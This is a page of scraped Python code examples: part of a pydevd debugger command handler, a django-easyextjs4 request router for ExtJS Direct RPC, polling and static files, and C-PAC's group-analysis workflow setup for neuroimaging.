                        for line in text.split('||'):  # Can be bulk-created (one in each line)
                            filename, line_number = line.split('|')
                            if not IS_PY3K:
                                filename = filename.encode(file_system_encoding)

                            filename = pydevd_file_utils.norm_file_to_server(filename)

                            if os.path.exists(filename):
                                lines_ignored = py_db.filename_to_lines_where_exceptions_are_ignored.get(filename)
                                if lines_ignored is None:
                                    lines_ignored = py_db.filename_to_lines_where_exceptions_are_ignored[filename] = {}
                                lines_ignored[int(line_number)] = 1
                            else:
                                sys.stderr.write('pydev debugger: warning: trying to ignore exception thrown'\
                                    ' on file that does not exist: %s (will have no effect)\n' % (filename,))

            elif cmd_id == CMD_ENABLE_DONT_TRACE:
                if text:
                    true_str = 'true'  # Not all 3.x versions support u'str', so, doing workaround.
                    if not IS_PY3K:
                        true_str = unicode(true_str)

                    mode = text.strip() == true_str
                    pydevd_dont_trace.trace_filter(mode)

            else:
                #I have no idea what this is all about
                cmd = py_db.cmd_factory.make_error_message(seq, "unexpected command " + str(cmd_id))

            if cmd is not None:
                py_db.writer.add_command(cmd)
                del cmd

        except Exception:
            traceback.print_exc()
            from _pydev_bundle.pydev_imports import StringIO
            stream = StringIO()
            traceback.print_exc(file=stream)
            cmd = py_db.cmd_factory.make_error_message(
                seq,
                "Unexpected exception in process_net_command.\nInitial params: %s. Exception: %s" % (
                    ((cmd_id, seq, text), stream.getvalue())
                )
            )

            py_db.writer.add_command(cmd)
    finally:
        py_db._main_lock.release()

Example 107

Project: django-easyextjs4
Source File: __init__.py
View license
    @staticmethod
    def Request(pRequest, pRootProject = None, pRootUrl = None, pIndex = 'index.html', pAlias = None):
        lRet = HttpResponse(status = 400, content = '<h1>HTTP 400 - Bad Request</h1>The request cannot be fulfilled due to bad syntax.')

        # Remove http://<host name>:<port>/ from pRootUrl
        pRootUrl = urlparse(pRootUrl).path

        # Valid the url. 
        lPath = urlparse(pRequest.path).path
        lMatch = re.match('^/[0-9a-zA-Z\.\/\-\_]*$', lPath) 
    
        if lMatch is None:
            raise ExtJSError('You have some invalid characters on the Url: "%s"' % pRootUrl)
    
        if pRootUrl is not None:
            # If the root for the url is specify check if the Url begin with this path
            if lPath.find(pRootUrl) != 0:
                raise ExtJSError('Invalid root for the Url: "%s"' % pRootUrl)
            # Remove url root from the path
            lPath = lPath[len(pRootUrl):]
        else:
            # If url root is not specify doesn't validate it 
            pRootUrl = ''
    
        # Detect if the URL it's to return javascript wrapper        
        lUrlApis = re.search('^(\w*\.js)$', lPath)
        
        if lUrlApis is not None:
            lUrlApi = lUrlApis.group(1)
            
            if lUrlApi in Ext.__URLSAPI:
                # URL found => Generate javascript wrapper
                lRemoteAPI = dict()
                for lClass in Ext.__URLSAPI[lUrlApi]:
                    lExt = lClass.__ExtJS
                    
                    if lExt.Url not in lRemoteAPI:
                        # Collect all class with the same Url
                        lRemoteAPI[lExt.Url] = dict()
                        lCurrent = lRemoteAPI[lExt.Url]
                        if 'format' in pRequest.REQUEST and pRequest.REQUEST['format'] == 'json':
                            # 'descriptor' is need it for Sencha Architect to recognize your API
                            lCurrent['descriptor'] = lClass.__name__ + '.REMOTING_API'
                            if lExt.NameSpace is not None:
                                 lCurrent['descriptor'] = lExt.NameSpace + '.' + lCurrent['descriptor']
                        lCurrent['url'] = lExt.Url
                        lCurrent['type'] = 'remoting'
                        if lExt.Id is not None:
                            lCurrent['id'] = lExt.Id
                        if lExt.NameSpace is not None:
                            lCurrent['namespace'] = lExt.NameSpace
                        lCurrent['actions'] = dict()
                        lAction = lCurrent['actions']
                    
                    if len(lExt.StaticMethods) > 0:
                        # Define a class as an Action with a list of functions
                        lRemoteMethods = list()
                        for lMethod in lExt.StaticMethods:
                            lMethodInfo = lExt.StaticMethods[lMethod]
                            if not lMethodInfo.NameParams:
                                lMethodExt = dict(name = lMethod, len = len(lMethodInfo.Args))
                            else:
                                # Type not supported with python 2.7 or lower.
                                if sys.version_info < (3, 0):
                                    lMethodExt = dict(name = lMethod, params = lMethodInfo.Args)
                                else:
                                    if not lMethodInfo.TypeParams:
                                        lMethodExt = dict(name = lMethod, params = lMethodInfo.Args)
                                    else:
                                        # TODO: support this feature for python 3.x
                                        # Must return something like this :
                                        #    "params": [{
                                        #    "name": "path",
                                        #    "type": "string",
                                        #    "pos": 0
                                        #    },
                                        raise ExtJSError('Type for parameters not supported yet')
                            lRemoteMethods.append(lMethodExt)
                        # Each class is define as an 'Action' 
                        lAction[lClass.__name__] = lRemoteMethods
                    for lKey in lExt.StaticEvents:
                        # Each event is define as a Provider for ExtJS. Even if it share the same namespace.
                        lEvent = lExt.StaticEvents[lKey]
                        lRemote = dict()
                        lRemote['url'] = lEvent.Url
                        lRemote['type'] = 'polling'
                        if lEvent.Id is not None:
                            lRemote['id'] = lEvent.Id
                        if lEvent.NameSpace is not None:
                            lRemote['namespace'] = lEvent.NameSpace
                        if lEvent.Params is not None:
                            lRemote['baseParams'] = lEvent.Params
                        if lEvent.Interval is not None:
                            lRemote['interval'] = lEvent.Interval
                        lRemoteAPI[lEvent.Url] = lRemote

                if len(lRemoteAPI) > 0:    
                    lJsonRemoteAPI = json.dumps(lRemoteAPI.values(),default=ExtJsonHandler)
                    
                    lNameSpace = lClass.__name__
                    if lExt.NameSpace is not None:
                        lNameSpace = lExt.NameSpace + '.' + lNameSpace
                    
                    if 'format' in pRequest.REQUEST and pRequest.REQUEST['format'] == 'json':
                        # Define JSON format for Sencha Architect
                        lContent = 'Ext.require(\'Ext.direct.*\');Ext.namespace(\''+ lNameSpace +'\');'+ lNameSpace + '.REMOTING_API = ' + lJsonRemoteAPI[1:len(lJsonRemoteAPI)-1] + ';'
                    else:
                        # Otherwise it's return a Javascript. Each javascript must be include under the index.html like this:
                        # <script type="text/javascript" src="api.js"></script>
                        # Automatically your API is declare on ExtJS and available on your app.js. 
                        lContent = 'Ext.require(\'Ext.direct.*\');Ext.namespace(\''+ lNameSpace +'\');Ext.onReady( function() { Ext.direct.Manager.addProvider(' + lJsonRemoteAPI[1:len(lJsonRemoteAPI)-1] + ');});'
                    lRet = HttpResponse(content = lContent, mimetype='application/javascript')
        else:
            # Detect if the URL it's a RPC or a Poll request
            lUrlRPCsorPolls = re.search('^(\w*)$', lPath)
        
            if lUrlRPCsorPolls is not None:
                lUrl = lUrlRPCsorPolls.group(1)
                
                if lUrl in Ext.__URLSRPC:
                    
                    # URL recognize as a RPC
                    
                    # Extract data from raw post. We can not trust pRequest.POST
                    lReceiveRPCs = json.loads(pRequest.body)
                    
                    # Force to be a list of dict
                    if type(lReceiveRPCs) == dict:
                        lReceiveRPCs = [lReceiveRPCs]
                    
                    # Extract URL 
                    lClassesForUrl = Ext.__URLSRPC[lUrl]

                    # Initialize content
                    lContent = list()

                    for lReceiveRPC in lReceiveRPCs:
                        # Execute each RPC request
                        
                        lRcvClass = lReceiveRPC['action']
                        lRcvMethod = lReceiveRPC['method']

                        # Create name API
                        lMethodName = lRcvClass + '.' + lRcvMethod
                            
                        # Prepare answer
                        lAnswerRPC = dict(type = 'rpc', tid = lReceiveRPC['tid'], action = lRcvClass, method = lRcvMethod)
                        
                        # Prepare exception
                        lExceptionData = dict(Url = lUrl, Type = 'rpc', Tid = lReceiveRPC['tid'], Name = lMethodName )
                        lException = dict(type = 'exception', data = lExceptionData, message = None)
                        
                        if lRcvClass in lClassesForUrl:
                            
                            # URL for RPC founded
                            lClass = lClassesForUrl[lRcvClass]
                            lExt = lClass.__ExtJS
                            
                            if lRcvMethod in lExt.StaticMethods:
                                
                                # Method founded
                                lMethod = lExt.StaticMethods[lRcvMethod]
                                
                                # Name used for exception message
                                if lExt.NameSpace is not None:
                                    lMethodName = lExt.NameSpace + '.' + lMethodName 

                                # Add Id if it's define
                                if lExt.Id is not None:
                                    lExceptionData['Id'] = lExt.Id
                                
                                # Extract datas
                                lArgs = lReceiveRPC['data']
                                
                                # Control and call method  
                                if lArgs is None:
                                    if len(lMethod.Args) != 0:
                                        lException['message'] = '%s numbers of parameters invalid' % lMethodName
                                    else:
                                        try:
                                            # Call method with no parameter
                                            if lMethod.Session is None:
                                                lRetMethod = lMethod.Call()
                                            else:
                                                lRetMethod = lMethod.Call(pSession = lMethod.Session(pRequest))
                                            if lRetMethod is not None:
                                                lAnswerRPC['result'] = lRetMethod
                                        except Exception as lErr:
                                            lException['message'] = '%s: %s' % (lMethodName, str(lErr)) 
                                elif type(lArgs) == list:
                                    if len(lArgs) > len(lMethod.Args):
                                        lException['message'] = '%s numbers of parameters invalid' % lMethodName
                                    else:
                                        try:
                                            # Call method with list of parameters  
                                            if lMethod.Session is None:
                                                lRetMethod = lMethod.Call(*lArgs)
                                            else:
                                                lArgs.insert(0,lMethod.Session(pRequest))
                                                lRetMethod = lMethod.Call(*lArgs)
                                            if lRetMethod is not None:
                                                lAnswerRPC['result'] = lRetMethod
                                        except Exception as lErr:
                                            lException['message'] = '%s: %s' % (lMethodName, str(lErr)) 
                                elif type(lArgs) == dict:
                                    if not lMethod.NameParams:
                                        lException['message'] = '%s does not support named parameters' % lMethodName
                                    else: 
                                        if len(lArgs.keys()) > len(lMethod.Args):
                                            lException['message'] = '%s numbers of parameters invalid' % lMethodName
                                        else:
                                            lInvalidParam = list()
                                            for lParam in lArgs:
                                                if lParam not in lMethod.Args:
                                                     lInvalidParam.append(lParam)
                                            if len(lInvalidParam) > 0:
                                                lException['message'] = '%s: Parameters unknown -> %s' % ",".join(lInvalidParam) 
                                            else:
                                                try:
                                                    # Call method with naming parameters
                                                    if lMethod.Session is None:
                                                        lRetMethod = lMethod.Call(**lArgs)
                                                    else:
                                                        lArgs['pSession'] = lMethod.Session(pRequest)
                                                        lRetMethod = lMethod.Call(**lArgs)
                                                    if lRetMethod is not None:
                                                        lAnswerRPC['result'] = lRetMethod
                                                except Exception as lErr:
                                                    lException['message'] = '%s: %s' % (lMethodName, str(lErr))
                            else:
                                lException['message'] = '%s: API not found' % lMethodName
                                
                        else:
                            lException['message'] = '%s: API not found' % lMethodName
                                
                        if lException['message'] is not None:
                            lContent.append(lException)    
                        else:
                            lContent.append(lAnswerRPC)
                            
                    if len(lContent) > 0:
                        if len(lContent) == 1:
                            lRet = HttpResponse(content = json.dumps(lContent[0],default=ExtJsonHandler), mimetype='application/json')
                        else:
                            lRet = HttpResponse(content = json.dumps(lContent,default=ExtJsonHandler), mimetype='application/json')
                                
                elif lUrl in Ext.__URLSEVT:

                    # URL Recognize as Poll request. A poll request will be catch by an Ext.StaticEvent.
                    
                    lClass = Ext.__URLSEVT[lUrl]
                    lExt = lClass.__ExtJS
                    
                    lEvent = lExt.StaticEvents[lUrl]
                    
                    # Define the name of the event this will be fire on ExtJS
                    if lEvent.EventName is not None:
                        # Use the one specify with @Ext.StaticEvent parameter pEventName
                        lEventName = lEvent.Name
                    else: 
                        # This name is build with the concatanation of the name space, classe name and name event
                        lEventName = lEvent.Name
                        
                        if len(lEvent.ClassName) != 0:
                            lEventName = lEvent.ClassName + '.' + lEvent.Name
                        
                        if len(lEvent.NameSpace) != 0:
                            lEventName = lEvent.NameSpace + '.' + lEventName
                        
                    # Prepare event answer
                    lAnswerEvent = dict(type = 'event', name = lEventName, data = None)
                    
                    # Prepare exception 
                    #  Data exception have the same structur as define for a method except we don't have Tid information. It set to -1. 
                    lExceptionData = dict(Url = lUrl, Type = 'event', Tid = -1, Name = lEventName )
                    lException = dict(type = 'exception', data = lExceptionData, message = None)
                    
                    # Add Id if it's define. With the id on your javascript code you can use something like this:
                    # Ext.direct.Manager.on('exception', function(e) {
                    # if (e.data.Type == 'event') 
                    #    {
                    #      lPoll = Ext.direct.Manager.getProvider(e.data.Id);
                    #       lPoll.disconnect();
                    #    }        
                    # }
                    if lEvent.Id is not None:
                        lAnswerEvent['Id'] = lEvent.Id
                        lExceptionData['Id'] = lEvent.Id
                    
                    # Extraction of parameters. For event parameters are in the POST. 
                    # If for a key we don't have a value than mean we received a simple list of parameters direct under the key.
                    # If the key have a value that mean we have naming parameters
                    lArgs = None
                    for lKey in pRequest.POST:
                        if pRequest.POST[lKey] == '':
                            if lArgs is None:
                                lArgs = list()
                            lArgs.extend(lKey.split(','))
                        else:
                            if lArgs is None:
                                lArgs = dict()
                            lArgs[lKey] = pRequest.POST[lKey] 
                    
                    # Control and call event  
                    if lArgs is None:
                        if len(lEvent.Args) != 0:
                            lException['message'] = '%s numbers of parameters invalid' % lEventName
                        else:
                            try:
                                # Call event with no parameter
                                if lEvent.Session is None:
                                    lRetEvt = lEvent.Call()
                                else:
                                    lRetEvt = lEvent.Call(pSession = lEvent.Session(pRequest))
                                if lRetEvt is not None:
                                    lAnswerEvent['data'] = lRetEvt
                            except Exception as lErr:
                                lException['message'] = '%s: %s' % (lEventName, str(lErr)) 
                    elif type(lArgs) == list:
                        if len(lArgs) > len(lEvent.Args):
                            lException['message'] = '%s numbers of parameters invalid' % lEventName
                        else:
                            try:
                                # Call event with list of parameters  
                                if lEvent.Session is None:
                                    lRetEvt = lEvent.Call(*lArgs)
                                else:
                                    lArgs.insert(0,lEvent.Session(pRequest))
                                    lRetEvt = lEvent.Call(*lArgs)
                                if lRetEvt is not None:
                                    lAnswerEvent['data'] = lRetEvt
                            except Exception as lErr:
                                lException['message'] = '%s: %s' % (lEventName, str(lErr)) 
                    elif type(lArgs) == dict:
                        if len(lArgs.keys()) > len(lEvent.Args):
                            lException['message'] = '%s numbers of parameters invalid' % lEventName
                        else:
                            lInvalidParam = list()
                            for lParam in lArgs:
                                if lParam not in lEvent.Args:
                                     lInvalidParam.append(lParam)
                            if len(lInvalidParam) > 0:
                                lException['message'] = '%s: Parameters unknown -> %s' % ",".join(lInvalidParam) 
                            else:
                                try:
                                    # Call event with naming parameters
                                    if lEvent.Session is None:
                                        lRetEvt = lEvent.Call(**lArgs)
                                    else:
                                        lArgs['pSession'] = lEvent.Session(pRequest)
                                        lRetEvt = lEvent.Call(**lArgs)
                                    if lRetEvt is not None:
                                        lAnswerEvent['data'] = lRetEvt
                                except Exception as lErr:
                                    lException['message'] = '%s: %s' % (lEventName, str(lErr)) 
                                
                    if lException['message'] is not None:
                        lContent = lException    
                    else:
                        lContent = lAnswerEvent
                    
                    lRet = HttpResponse(content = json.dumps(lContent,default=ExtJsonHandler), mimetype='application/json')
    
        if lRet.status_code != 200:
            # The URL is not to return the API, not to execute a RPC or an event. It's just to get a file
            if pRootProject is not None:
                if not os.path.exists(pRootProject):
                    raise ExtJSError('Invalid root for the project: "%s"' % pRootProject)
            else:
                # if the root project is not specify get the path of the current folder
                pRootProject = os.getcwd()
        
            # The path is empty try to find and load index.html (or the file specify with pIndex)   
            if len(lPath) == 0:
                lPath = pIndex
    
            # Rebuild path to valid it         
            lPath = os.path.normpath("/".join([pRootProject,lPath]))
            lFileName, lFileExt = os.path.splitext(lPath)
           
            # Check if the path exist and if the extension is valid
            if not os.path.exists(lPath):
                raise ExtJSError('File not found: "%s"' % lPath)
            else:
                if lFileExt not in ['.html','.css','.js','.png','.jpg','.gif','.json','.xml']:
                    raise ExtJSError('File extension is invalid: "%s"' % lFileExt)
                else:
                    try:
                        lMime = mimetypes.types_map[lFileExt]
                    except Exception as lException:
                        if isinstance(lException,KeyError) and lFileExt == '.json':
                            lMime = 'text/json'
                        else:
                            raise lException
                    # TODO: Manage a chache file
                    lFile = open(lPath)
                    lContent = lFile.read()
                    lFile.close()
                    lRet = HttpResponse(content = lContent, mimetype = lMime)
              
        return lRet

Example 108

Project: C-PAC
Source File: cpac_ga_model_generator.py
View license
def prep_group_analysis_workflow(model_df, pipeline_config_path, \
    model_name, group_config_path, resource_id, preproc_strat, \
    series_or_repeated_label):
    
    #
    # this function runs once per derivative type and preproc strat combo
    # during group analysis
    #

    import os
    import patsy
    import numpy as np

    import nipype.pipeline.engine as pe
    import nipype.interfaces.utility as util
    import nipype.interfaces.io as nio

    from CPAC.pipeline.cpac_group_runner import load_config_yml
    from CPAC.utils.create_flame_model_files import create_flame_model_files
    from CPAC.utils.create_group_analysis_info_files import write_design_matrix_csv

    pipeline_config_obj = load_config_yml(pipeline_config_path)
    group_config_obj = load_config_yml(group_config_path)

    pipeline_ID = pipeline_config_obj.pipelineName

    # remove file names from preproc_strat
    filename = preproc_strat.split("/")[-1]
    preproc_strat = preproc_strat.replace(filename,"")
    preproc_strat = preproc_strat.lstrip("/").rstrip("/")

    # get thresholds
    z_threshold = float(group_config_obj.z_threshold[0])

    p_threshold = float(group_config_obj.p_threshold[0])

    sub_id_label = group_config_obj.participant_id_label

    ftest_list = []
    readme_flags = []

    # determine if f-tests are included or not
    custom_confile = group_config_obj.custom_contrasts

    if ((custom_confile == None) or (custom_confile == '') or \
            ("None" in custom_confile) or ("none" in custom_confile)):

        custom_confile = None

        if (len(group_config_obj.f_tests) == 0) or \
            (group_config_obj.f_tests == None):
            fTest = False
        else:
            fTest = True
            ftest_list = group_config_obj.f_tests

    else:

        if not os.path.exists(custom_confile):
            errmsg = "\n[!] CPAC says: You've specified a custom contrasts " \
                     ".CSV file for your group model, but this file cannot " \
                     "be found. Please double-check the filepath you have " \
                     "entered.\n\nFilepath: %s\n\n" % custom_confile
            raise Exception(errmsg)

        with open(custom_confile,"r") as f:
            evs = f.readline()

        evs = evs.rstrip('\r\n').split(',')
        count_ftests = 0

        fTest = False

        for ev in evs:
            if "f_test" in ev:
                count_ftests += 1

        if count_ftests > 0:
            fTest = True


    # create path for output directory
    out_dir = os.path.join(group_config_obj.output_dir, \
        "group_analysis_results_%s" % pipeline_ID, \
        "group_model_%s" % model_name, resource_id, \
        series_or_repeated_label, preproc_strat)

    if 'sca_roi' in resource_id:
        out_dir = os.path.join(out_dir, \
            re.search('sca_roi_(\d)+',os.path.splitext(\
                os.path.splitext(os.path.basename(\
                    model_df["Filepath"][0]))[0])[0]).group(0))
            
    if 'dr_tempreg_maps_zstat_files_to_standard_smooth' in resource_id:
        out_dir = os.path.join(out_dir, \
            re.search('temp_reg_map_z_(\d)+',os.path.splitext(\
                os.path.splitext(os.path.basename(\
                    model_df["Filepath"][0]))[0])[0]).group(0))
            
    if 'centrality' in resource_id:
        names = ['degree_centrality_binarize', 'degree_centrality_weighted', \
                 'eigenvector_centrality_binarize', \
                 'eigenvector_centrality_weighted', \
                 'lfcd_binarize', 'lfcd_weighted']

        for name in names:
            if name in filename:
                out_dir = os.path.join(out_dir, name)
                break

    if 'tempreg_maps' in resource_id:
        out_dir = os.path.join(out_dir, re.search('\w*[#]*\d+', \
            os.path.splitext(os.path.splitext(os.path.basename(\
                model_df["Filepath"][0]))[0])[0]).group(0))

    model_path = os.path.join(out_dir, 'model_files')

    second_half_out = \
        out_dir.split("group_analysis_results_%s" % pipeline_ID)[1]

    # generate working directory for this output's group analysis run
    work_dir = os.path.join(pipeline_config_obj.workingDirectory, \
        "group_analysis", second_half_out.lstrip("/"))

    log_dir = os.path.join(pipeline_config_obj.logDirectory, \
        "group_analysis", second_half_out.lstrip("/"))

    # create the actual directories
    create_dir(model_path, "group analysis output")
    create_dir(work_dir, "group analysis working")
    create_dir(log_dir, "group analysis logfile")


    # create new subject list based on which subjects are left after checking
    # for missing outputs
    new_participant_list = []
    for part in list(model_df["Participant"]):
        # do this instead of using "set" just in case, to preserve order
        #   only reason there may be duplicates is because of multiple-series
        #   repeated measures runs
        if part not in new_participant_list:
            new_participant_list.append(part)

    new_sub_file = write_new_sub_file(model_path, \
                                      group_config_obj.participant_list, \
                                      new_participant_list)

    group_config_obj.update('participant_list',new_sub_file)

    num_subjects = len(list(model_df["Participant"]))


    # start processing the dataframe further
    design_formula = group_config_obj.design_formula

    # demean EVs set for demeaning
    for demean_EV in group_config_obj.ev_selections["demean"]:
        model_df[demean_EV] = model_df[demean_EV].astype(float)
        model_df[demean_EV] = model_df[demean_EV].sub(model_df[demean_EV].mean())

    # demean the motion params
    if ("MeanFD" in design_formula) or ("MeanDVARS" in design_formula):
        params = ["MeanFD_Power", "MeanFD_Jenkinson", "MeanDVARS"]
        for param in params:
            model_df[param] = model_df[param].astype(float)
            model_df[param] = model_df[param].sub(model_df[param].mean())


    # create 4D merged copefile, in the correct order, identical to design
    # matrix
    merge_outfile = model_name + "_" + resource_id + "_merged.nii.gz"
    merge_outfile = os.path.join(model_path, merge_outfile)

    merge_file = create_merged_copefile(list(model_df["Filepath"]), \
                                        merge_outfile)

    # create merged group mask
    merge_mask_outfile = model_name + "_" + resource_id + \
                             "_merged_mask.nii.gz"
    merge_mask_outfile = os.path.join(model_path, merge_mask_outfile)
    merge_mask = create_merge_mask(merge_file, merge_mask_outfile)

    if "Group Mask" in group_config_obj.mean_mask:
        mask_for_means = merge_mask
    else:
        individual_masks_dir = os.path.join(model_path, "individual_masks")
        create_dir(individual_masks_dir, "individual masks")
        for unique_id, series_id, raw_filepath in zip(model_df["Participant"],
            model_df["Series"], model_df["Raw_Filepath"]):
            
            mask_for_means_path = os.path.join(individual_masks_dir,
                "%s_%s_%s_mask.nii.gz" % (unique_id, series_id, resource_id))
            mask_for_means = create_merge_mask(raw_filepath, 
                                               mask_for_means_path)
        readme_flags.append("individual_masks")

    # calculate measure means, and demean
    if "Measure_Mean" in design_formula:
        model_df = calculate_measure_mean_in_df(model_df, mask_for_means)

    # calculate custom ROIs, and demean (in workflow?)
    if "Custom_ROI_Mean" in design_formula:

        custom_roi_mask = group_config_obj.custom_roi_mask

        if (custom_roi_mask == None) or (custom_roi_mask == "None") or \
            (custom_roi_mask == "none") or (custom_roi_mask == ""):
            err = "\n\n[!] You included 'Custom_ROI_Mean' in your design " \
                  "formula, but you didn't supply a custom ROI mask file." \
                  "\n\nDesign formula: %s\n\n" % design_formula
            raise Exception(err)

        # make sure the custom ROI mask file is the same resolution as the
        # output files - if not, resample and warn the user
        roi_mask = check_mask_file_resolution(list(model_df["Raw_Filepath"])[0], \
                                              custom_roi_mask, mask_for_means, \
                                              model_path, resource_id)

        # trim the custom ROI mask to be within mask constraints
        output_mask = os.path.join(model_path, "masked_%s" \
                                   % os.path.basename(roi_mask))
        roi_mask = trim_mask(roi_mask, mask_for_means, output_mask)
        readme_flags.append("custom_roi_mask_trimmed")

        # calculate
        model_df = calculate_custom_roi_mean_in_df(model_df, roi_mask)

        # update the design formula
        new_design_substring = ""
        for col in model_df.columns:
            if "Custom_ROI_Mean_" in str(col):
                if str(col) == "Custom_ROI_Mean_1":
                    new_design_substring = new_design_substring + " %s" % col
                else:
                    new_design_substring = new_design_substring +" + %s" % col
        design_formula = design_formula.replace("Custom_ROI_Mean", \
                                                new_design_substring)


    cat_list = []
    if "categorical" in group_config_obj.ev_selections.keys():
        cat_list = group_config_obj.ev_selections["categorical"]


    # prep design for repeated measures, if applicable
    if len(group_config_obj.sessions_list) > 0:
        design_formula = design_formula + " + Session"
        if "Session" not in cat_list:
            cat_list.append("Session")
    if len(group_config_obj.series_list) > 0:
        design_formula = design_formula + " + Series"
        if "Series" not in cat_list:
            cat_list.append("Series")
    for col in list(model_df.columns):
        if "participant_" in col:
            design_formula = design_formula + " + %s" % col
            cat_list.append(col)


    # parse out the EVs in the design formula at this point in time
    #   this is essentially a list of the EVs that are to be included
    ev_list = parse_out_covariates(design_formula)


    # SPLIT GROUPS here.
    #   CURRENT PROBLEMS: was creating a few doubled-up new columns
    grp_vector = [1] * num_subjects

    if group_config_obj.group_sep:

        # model group variances separately
        old_ev_list = ev_list

        model_df, grp_vector, ev_list, cat_list = split_groups(model_df, \
                                group_config_obj.grouping_var, \
                                ev_list, cat_list)

        # make the grouping variable categorical for Patsy (if we try to
        # do this automatically below, it will categorical-ize all of 
        # the substrings too)
        design_formula = design_formula.replace(group_config_obj.grouping_var, \
                                  "C(" + group_config_obj.grouping_var + ")")
        if group_config_obj.coding_scheme == "Sum":
            design_formula = design_formula.replace(")", ", Sum)")

        # update design formula
        rename = {}
        for old_ev in old_ev_list:
            for new_ev in ev_list:
                if old_ev + "__FOR" in new_ev:
                    if old_ev not in rename.keys():
                        rename[old_ev] = []
                    rename[old_ev].append(new_ev)

        for old_ev in rename.keys():
            design_formula = design_formula.replace(old_ev, \
                                                   " + ".join(rename[old_ev]))


    # prep design formula for Patsy
    design_formula = patsify_design_formula(design_formula, cat_list, \
                         group_config_obj.coding_scheme[0])
    print design_formula
    # send to Patsy
    try:
        dmatrix = patsy.dmatrix(design_formula, model_df)
    except Exception as e:
        err = "\n\n[!] Something went wrong with processing the group model "\
              "design matrix using the Python Patsy package. Patsy might " \
              "not be properly installed, or there may be an issue with the "\
              "formatting of the design matrix.\n\nPatsy-formatted design " \
              "formula: %s\n\nError details: %s\n\n" \
              % (model_df.columns, design_formula, e)
        raise Exception(err)

    print dmatrix.design_info.column_names
    print dmatrix

    # check the model for multicollinearity - Patsy takes care of this, but
    # just in case
    check_multicollinearity(np.array(dmatrix))

    # prepare for final stages
    column_names = dmatrix.design_info.column_names

    # what is this for?
    design_matrix = np.array(dmatrix, dtype=np.float16)
    
        
    # check to make sure there are more time points than EVs!
    if len(column_names) >= num_subjects:
        err = "\n\n[!] CPAC says: There are more EVs than there are " \
              "participants currently included in the model for %s. There " \
              "must be more participants than EVs in the design.\n\nNumber " \
              "of participants: %d\nNumber of EVs: %d\n\nEV/covariate list: "\
              "%s\n\nNote: If you specified to model group " \
              "variances separately, the amount of EVs can nearly double " \
              "once they are split along the grouping variable.\n\n" \
              "If the number of subjects is lower than the number of " \
              "subjects in your group analysis subject list, this may be " \
              "because not every subject in the subject list has an output " \
              "for %s in the individual-level analysis output directory.\n\n"\
              % (resource_id, num_subjects, len(column_names), column_names, \
                 resource_id)
        raise Exception(err)

    # time for contrasts
    contrasts_dict = None

    if ((custom_confile == None) or (custom_confile == '') or \
            ("None" in custom_confile) or ("none" in custom_confile)):

        # if no custom contrasts matrix CSV provided (i.e. the user
        # specified contrasts in the GUI)
        contrasts_list = group_config_obj.contrasts
        contrasts_dict = create_contrasts_dict(dmatrix, contrasts_list,
            resource_id)

    # check the merged file's order
    check_merged_file(model_df["Filepath"], merge_file)

    # we must demean the categorical regressors if the Intercept/Grand Mean
    # is included in the model, otherwise FLAME produces blank outputs
    if "Intercept" in column_names:

        cat_indices = []
        col_name_indices = dmatrix.design_info.column_name_indexes
        for col_name in col_name_indices.keys():
            if "C(" in col_name:
                cat_indices.append(int(col_name_indices[col_name]))

        # note: dmat_T is now no longer a DesignMatrix Patsy object, but only
        # an array
        dmat_T = dmatrix.transpose()

        for index in cat_indices:
            new_row = []
            for val in dmat_T[index]:
                new_row.append(val - dmat_T[index].mean())
            dmat_T[index] = new_row

        # we can go back, but we won't be the same
        dmatrix = dmat_T.transpose()

        readme_flags.append("cat_demeaned")

    # send off the info so the FLAME input model files can be generated!
    mat_file, grp_file, con_file, fts_file = create_flame_model_files(dmatrix, \
        column_names, contrasts_dict, custom_confile, ftest_list, \
        group_config_obj.group_sep, grp_vector, group_config_obj.coding_scheme[0], \
        model_name, resource_id, model_path)

    dmat_csv_path = os.path.join(model_path, "design_matrix.csv")
    write_design_matrix_csv(dmatrix, model_df["Participant"], column_names, \
        dmat_csv_path)

    # workflow time
    wf_name = "%s_%s" % (resource_id, series_or_repeated_label)
    wf = pe.Workflow(name=wf_name)

    wf.base_dir = work_dir
    crash_dir = os.path.join(pipeline_config_obj.crashLogDirectory, \
                             "group_analysis", model_name)

    wf.config['execution'] = {'hash_method': 'timestamp', \
                              'crashdump_dir': crash_dir} 

    # gpa_wf
    # Creates the actual group analysis workflow
    gpa_wf = create_group_analysis(fTest, "gp_analysis_%s" % wf_name)

    gpa_wf.inputs.inputspec.merged_file = merge_file
    gpa_wf.inputs.inputspec.merge_mask = merge_mask

    gpa_wf.inputs.inputspec.z_threshold = z_threshold
    gpa_wf.inputs.inputspec.p_threshold = p_threshold
    gpa_wf.inputs.inputspec.parameters = (pipeline_config_obj.FSLDIR, \
                                          'MNI152')

    gpa_wf.inputs.inputspec.mat_file = mat_file
    gpa_wf.inputs.inputspec.con_file = con_file
    gpa_wf.inputs.inputspec.grp_file = grp_file

    if fTest:
        gpa_wf.inputs.inputspec.fts_file = fts_file      

    # ds
    # Creates the datasink node for group analysis
    ds = pe.Node(nio.DataSink(), name='gpa_sink')
     
    #     if c.mixedScanAnalysis == True:
    #         out_dir = re.sub(r'(\w)*scan_(\w)*(\d)*(\w)*[/]', '', out_dir)
              
    ds.inputs.base_directory = str(out_dir)
    ds.inputs.container = ''
        
    ds.inputs.regexp_substitutions = [(r'(?<=rendered)(.)*[/]','/'),
                                      (r'(?<=model_files)(.)*[/]','/'),
                                      (r'(?<=merged)(.)*[/]','/'),
                                      (r'(?<=stats/clusterMap)(.)*[/]','/'),
                                      (r'(?<=stats/unthreshold)(.)*[/]','/'),
                                      (r'(?<=stats/threshold)(.)*[/]','/'),
                                      (r'_cluster(.)*[/]',''),
                                      (r'_slicer(.)*[/]',''),
                                      (r'_overlay(.)*[/]','')]
   

    ########datasink connections#########
    #if fTest:
    #    wf.connect(gp_flow, 'outputspec.fts',
    #               ds, '[email protected]') 
        
    #wf.connect(gp_flow, 'outputspec.mat',
    #           ds, '[email protected]' )
    #wf.connect(gp_flow, 'outputspec.con',
    #           ds, '[email protected]')
    #wf.connect(gp_flow, 'outputspec.grp',
    #           ds, '[email protected]')
    wf.connect(gpa_wf, 'outputspec.merged',
               ds, 'merged')
    wf.connect(gpa_wf, 'outputspec.zstats',
               ds, 'stats.unthreshold')
    wf.connect(gpa_wf, 'outputspec.zfstats',
               ds,'[email protected]')
    wf.connect(gpa_wf, 'outputspec.fstats',
               ds,'[email protected]')
    wf.connect(gpa_wf, 'outputspec.cluster_threshold_zf',
               ds, 'stats.threshold')
    wf.connect(gpa_wf, 'outputspec.cluster_index_zf',
               ds,'stats.clusterMap')
